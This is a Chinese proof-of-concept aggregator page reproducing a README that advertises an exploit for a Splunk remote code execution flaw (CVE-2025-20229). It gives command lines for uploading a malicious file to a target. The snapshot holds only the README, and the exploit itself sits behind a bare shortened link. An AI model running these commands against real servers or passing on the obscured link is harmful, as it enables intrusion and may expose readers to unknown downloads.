POC详情: 8c5f6bb6714e7ef58e1ce568c98af297e6aacf29

来源
https://github.com/allinsthon/CVE-2025-20229
关联漏洞
标题: Splunk Cloud Platform和Splunk Enterprise 访问控制错误漏洞 (CVE-2025-20229)
描述:Splunk Cloud Platform和Splunk Enterprise都是美国Splunk公司的产品。Splunk Cloud Platform是一个强大的数据收集、处理和分析服务。Splunk Enterprise是一套数据收集分析软件。 Splunk Cloud Platform和Splunk Enterprise存在访问控制错误漏洞,该漏洞源于低权限用户可能通过文件上传执行远程代码。
介绍
# CVE-2025-20229 Exploit

## Overview
This repository contains an exploit for CVE-2025-20229, a Remote Code Execution (RCE) vulnerability in Splunk Enterprise and Splunk Cloud Platform. The exploit allows a low-privileged user to upload malicious files, enabling arbitrary code execution on the target system.

## Requirements
- Python 3.8+
- Valid authentication token for a low-privileged Splunk account
- Target Splunk instance URL

## Usage
1. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```
2. Run the exploit script:
   ```bash
   python3 cve-2025-20229.py <target_url> <malicious_file> <auth_token>
   ```
   - `<target_url>`: The Splunk instance URL (e.g., `http://target:8000`)
   - `<malicious_file>`: Path to the malicious file to upload
   - `<auth_token>`: Valid Splunk authentication token

## Example
```bash
python3 cve-2025-20229.py http://target:8000 malicious.sh abc123token
```

## Exploit
[href](https://tinyurl.com/2ct2kp73)

## Disclaimer
This exploit is provided for educational and authorized security testing purposes only. Use on systems without explicit permission is illegal and prohibited. The authors are not responsible for any misuse or damage caused by this tool.
文件快照

 [4.0K]  /data/pocs/8c5f6bb6714e7ef58e1ce568c98af297e6aacf29
└── [1.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。